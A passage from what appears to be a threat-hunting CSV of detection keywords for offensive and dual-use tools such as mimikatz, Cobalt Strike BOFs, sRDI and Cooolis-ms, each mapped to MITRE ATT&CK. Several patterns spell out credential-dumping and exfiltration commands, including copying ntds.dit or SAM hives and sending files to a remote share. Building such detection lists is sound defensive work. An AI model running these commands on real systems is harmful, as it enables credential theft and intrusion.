- MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ConvertTo-ROT13.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*ConvertTo-Shellcode -*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","0","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" +"*ConvertToShellcode*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*ConvertTo-Shellcode.*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" +"*ConvertTo-Shellcode.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*ConvertToShellcode.py*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*ConvertToShellcode.py*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" +"*cookie_graber_x64.o*","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","104","14","2023-05-28T18:41:15Z","2023-05-28T18:30:02Z" +"*cookie-graber.c*","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","104","14","2023-05-28T18:41:15Z","2023-05-28T18:30:02Z" +"*cookie-graber_x64.exe*","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","104","14","2023-05-28T18:41:15Z","2023-05-28T18:30:02Z" +"*Cookie-Graber-BOF*","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","104","14","2023-05-28T18:41:15Z","2023-05-28T18:30:02Z" +"*CookieProcessor.exe*","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","104","14","2023-05-28T18:41:15Z","2023-05-28T18:30:02Z" +"*cool*/cool.zip*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" +"*CoolerVoid/0d1n*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*coolv0.1.exe*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" +"*Cooolis*shellcode*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*CooolisAdjustTokenPrivileges*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*CooolisCreateRemoteThread*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-ExternalC2*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-ms.exe*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-msf*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-msX64.zip*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-msX86.zip*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-Reflective*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-Shellcode*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Cooolis-String.*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*CooolisVirtualAlloc*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*copy *\legit.sys *Windows\System32\Drivers\*.sys*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" +"*copy *\NTDS\ntds.dit *\Temp\*.*","greyware_tool_keyword","copy","the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.","T1003.001 - T1567.001 - T1070.004","TA0005 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*copy *NTDS\NTDS.dit*Temp*","greyware_tool_keyword","copy","copy the NTDS.dit file from a Volume Shadow Copy which contains sensitive Active Directory data including password hashes for all domain users","T1003.003","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*copy *sam.hive \\*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*copy *system.hive \\*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\*","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\*","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Copy New *gdrive://www.googleapis.com/GS_Sync/*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*Copy New *sftp://*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*CopyAndPasteEnum.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" +"*CopyAndPasteFileDownloader.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" +"*Copy-Item -Path * -Destination \\$IP\transfer*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*Copyright (c) 2023 whoamianony.top*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" +"*core/handler/reverse*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 